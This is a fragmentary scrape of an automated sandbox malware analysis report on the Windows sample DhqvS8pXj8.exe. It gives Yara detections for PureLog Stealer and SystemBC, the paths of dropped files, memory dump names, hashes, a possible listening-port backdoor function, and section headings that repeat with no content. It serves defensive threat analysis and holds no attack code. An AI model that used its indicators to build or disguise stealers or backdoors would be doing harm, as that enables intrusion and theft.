Source: Yara match	File source: 63.2.c1336f9f75.exe.a040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.2.c1336f9f75.exe.a040000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.3.c1336f9f75.exe.a040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.3.c1336f9f75.exe.a040000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.3.c1336f9f75.exe.9ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.3.c1336f9f75.exe.9ff0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.2.c1336f9f75.exe.9ff0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.2.c1336f9f75.exe.9ff0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 76.2.1e8dfbd5c2.exe.3c99550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2927194723.000000000A040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2927763179.000000000A17E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2927194723.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000003.2863781739.000000000A040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000004C.00000002.2782844886.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe, type: DROPPED
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 76.2.1e8dfbd5c2.exe.3c99550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 76.2.1e8dfbd5c2.exe.3c99550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 76.0.1e8dfbd5c2.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000004C.00000000.2507798493.0000000000992000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match	File source: 0000004C.00000002.2782844886.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\L5shRfh[1].exe, type: DROPPED

Yara detected SystemBC

Source: Yara match	File source: 7.2.k6Sly2p.exe.2a214e4.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 66.2.fbpbh.exe.33c0690.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 66.2.fbpbh.exe.33c0690.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.k6Sly2p.exe.2a214e4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2464434325.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000042.00000002.2801612037.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000042.00000002.2801612037.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: k6Sly2p.exe PID: 5796, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F91204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		8_2_00F91204
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F91806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		8_2_00F91806

Windows Analysis Report
DhqvS8pXj8.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Phishing

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1612327
Product:	CloudBasic
Start time:	18:15:24
Start date:	11.02.2025
Sample:	DhqvS8pXj8.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	582f90039d305a4706f8556ac74dcb90
SHA1:	39f2454fcdd5ffd812034b5e3b8b7183722214ec
SHA256:	7676247d21cfeaa362f445d12ae1985db713e69f59bd512fb6d69b7c38faf5f4
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report DhqvS8pXj8.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Phishing

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
DhqvS8pXj8.exe

Malware Threat Intel
Provided by